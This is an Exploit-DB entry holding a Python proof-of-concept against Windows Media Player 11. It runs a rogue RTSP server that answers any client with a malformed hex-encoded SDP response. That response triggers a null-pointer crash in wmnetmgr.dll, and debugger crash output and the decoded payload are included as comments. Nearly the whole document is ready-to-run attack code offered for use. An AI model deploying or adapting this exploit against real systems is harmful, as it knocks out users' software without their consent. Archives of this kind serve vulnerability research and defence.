Microsoft Windows Media Player 11.0.5721.5262 - Remote Denial of Service

EDB-ID:

18271

CVE:



Author:

Level

Type:

dos


Platform:

Windows

Date:

2011-12-24


import socket, binascii
print "\n"  
print "----------------------------------------------------------------" 
print "|      WMP11 Remote Null Pointer                                |" 
print "|      Level, Smash the Stack                                   |" 
print "|      Windows XP SP3 x86, Windows Media Player v11.0.5721.5262 |" 
print "|      Windows 7 SP2 x64, Windows Media Player v11.0.5721.5262  |" 
print "----------------------------------------------------------------" 
print "\n" 
print "Attack URL: mms://127.0.0.1/Sample_Broadcast\n\n"
HOST = "127.0.0.1"
PORT = 554
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(1)
buf = [
("525453502f312e3020323038204f4b0d0a436f6e74656e742d547970653a206170706c696361746"
"96f6e2f7364700d0a566172793a204163636570740d0a582d506c61796c6973742d47656e2d49643"
"a203137360d0a582d42726f6164636173742d49643a20300d0a436f6e74656e742d4c656e6774683"
"a203837390d0a446174653a2053756e2c203038204d617920323031312031353a32343a333320474"
"d540d0a435365713a20310d0a5365727665723a20574d5365727665722f392e312e312e333834310"
"d0a537570706f727465643a20636f6d2e6d6963726f736f66742e776d2e73727670706169722c206"
"36f6d2e6d6963726f736f66742e776d2e737377697463682c20636f6d2e6d6963726f736f66742e7"
"76d2e656f736d73672c20636f6d2e6d6963726f736f66742e776d2e6661737463616368652c20636"
"f6d2e6d6963726f736f66742e776d2e7061636b657470616972737372632c20636f6d2e6d6963726"
"f736f66742e776d2e7374617274757070726f66696c650d0a4c6173742d4d6f6469666965643a205"
"361742c2031372046656220323030372031333a31343a303420474d540d0a457461673a202231363"
"8220d0a43616368652d436f6e74726f6c3a206d61782d6167653d38363339392c20782d776d732d7"
"3747265616d2d747970653d2262726f6164636173742c20706c61796c697374222c206d7573742d7"
"26576616c69646174652c20707269766174652c20782d776d732d70726f78792d73706c69740d0a0"
"d0a763d306f3d2d20323031313035303831343339313330343036203230313130353038313433393"
"1333034303620494e20495034203132372e302e302e310d0a733d3c4e6f205469746c653e633d494"
"e2049503420302e302e302e30623d52523a30613d70676d70753a646174613a6170706c696361746"
"96f6e2f766e642e6d732e776d732d6864722e61736676313b6261736536342c4d4361796459356d7"
"a78476d3251437141474c4f624e4142414141414141414142674141414145436f6479726a4565707"
"a78474f35414441444342545a5767414141414141414141414141414141414141414141414141414"
"1414141414c784141414141414141414141414141414141414141664141414141414141414843677"
"7676b4141414141764d6e50435141414141433546514141414141414141414141414147416741414"
"26749414145673741414331413739664c716e504559376a414d414d49464e6c4c674141414141414"
"141415230744f7275716e504559376d414d414d49464e6c42674141414141416b516663743765707"
"a78474f35674441444342545a566f414141414141414141414f4562746b35627a78476f2f5143415"
"83178454b7742582b794256573838527150304167463963524373414141414141414141414177414"
"1414141414141414151414141414141514145414150414141414141414141416b516663743765707"
"a78474f35674441444342545a5849414141414141414141514a35702b4531627a78476f2f5143415"
"83178454b31444e77372b50596338526937494171674330346941414141414141414141414277414"
"1414149414141414167414141414141595145424145416641414151414141414151415141416f414"
"143494141434141414141414141455141424141415141417a6e5834653431473052474e676742676"
"c386d69736959414141414141414141416741424145673741414143414567374141417a4a724a316"
"a6d62504561625a414b6f41597335734b67414141414141414141434141494141674143414141414"
"141414141414141414141324a724a316a6d62504561625a414b6f415973357337443441414141414"
"1414141414141414141414141414141414141414141414148774141414141414141414241513d3d7"
"43d3020300d0a6d3d617564696f2030205254502f415650203936613d72656c6961626c650d0a0d0"
"a0d0a")
]
while True:
conn, addr = s.accept()
print "-----Request From Client-----\n"
print conn.recv(1024)
print "-----Request From Client-----\n"
print "-----Response From Server-----\n"
print binascii.unhexlify(buf[0])
print "-----Response From Server-----\n"
conn.send(binascii.unhexlify(buf[0]))
conn.close()
s.close()

#CRASH
#(ae8.5b8): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\system32\wmnetmgr.dll - 
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????
#0:021> g
#(ae8.5b8): Access violation - code c0000005 (!!! second chance !!!)
#eax=00000000 ebx=02ba4df8 ecx=00000000 edx=02b5c688 esi=013acff8 edi=00000000
#eip=128cd479 esp=02ebfb64 ebp=02ebfeec iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000246
#wmnetmgr!DllUnregisterServer+0x76320:
#128cd479 8bb914010000    mov     edi,dword ptr [ecx+114h] ds:0023:00000114=????????

#PAYLOAD#
#RTSP/1.0 208 OK 
#Content-Type: application/sdp
#Vary: Accept
#X-Playlist-Gen-Id: 176
#X-Broadcast-Id: 0
#Content-Length: 879
#Date: Sun, 08 May 2011 15:24:33 GMT
#CSeq: 1
#Server: WMServer/9.1.1.3841
#Supported: com.microsoft.wm.srvppair, com.microsoft.wm.sswitch, com.microsoft.wm.eosmsg, com.microsoft.wm.fastcache, com.microsoft.wm.packetpairssrc, com.microsoft.wm.startupprofile
#Last-Modified: Sat, 17 Feb 2007 13:14:04 GMT
#Etag: "168"
#Cache-Control: max-age=86399, x-wms-stream-type="broadcast, playlist", must-revalidate, private, x-wms-proxy-split
#v=0o=- 201105081439130406 201105081439130406 IN IP4 127.0.0.1
#s=<No Title>c=IN IP4 0.0.0.0b=RR:0a=pgmpu:data:application/vnd.ms.wms-hdr.asfv1;base64,MCaydY5mzxGm2QCqAGLObNABAAAAAAAABgAAAAECodyrjEepzxGO5ADADC
#BTZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALxAAAAAAAAAAAAAAAAAAAAfAAAAAAAAAHCgwgkAAAAAvM
#nPCQAAAAC5FQAAAAAAAAAAAAAGAgAABgIAAEg7AAC1A79fLqnPEY7jAMAMIFNlLgAAAAAAAAAR0tOruq
#nPEY7mAMAMIFNlBgAAAAAAkQfct7epzxGO5gDADCBTZVoAAAAAAAAAAOEbtk5bzxGo/QCAX1xEKwBX+y
#BVW88RqP0AgF9cRCsAAAAAAAAAAAwAAAAAAAAAAQAAAAAAQAEAAPAAAAAAAAAAkQfct7epzxGO5gDADC
#BTZXIAAAAAAAAAQJ5p+E1bzxGo/QCAX1xEK1DNw7+PYc8Ri7IAqgC04iAAAAAAAAAAABwAAAAIAAAAAg
#AAAAAAYQEBAEAfAAAQAAAAAQAQAAoAACIAACAAAAAAAAEQABAAAQAAznX4e41G0RGNggBgl8misiYAAA
#AAAAAAAgABAEg7AAACAEg7AAAzJrJ1jmbPEabZAKoAYs5sKgAAAAAAAAACAAIAAgACAAAAAAAAAAAAAA
#A2JrJ1jmbPEabZAKoAYs5s7D4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAHwAAAAAAAAABAQ==t=0 0m=audio 0 RTP/AVP 96a=reliable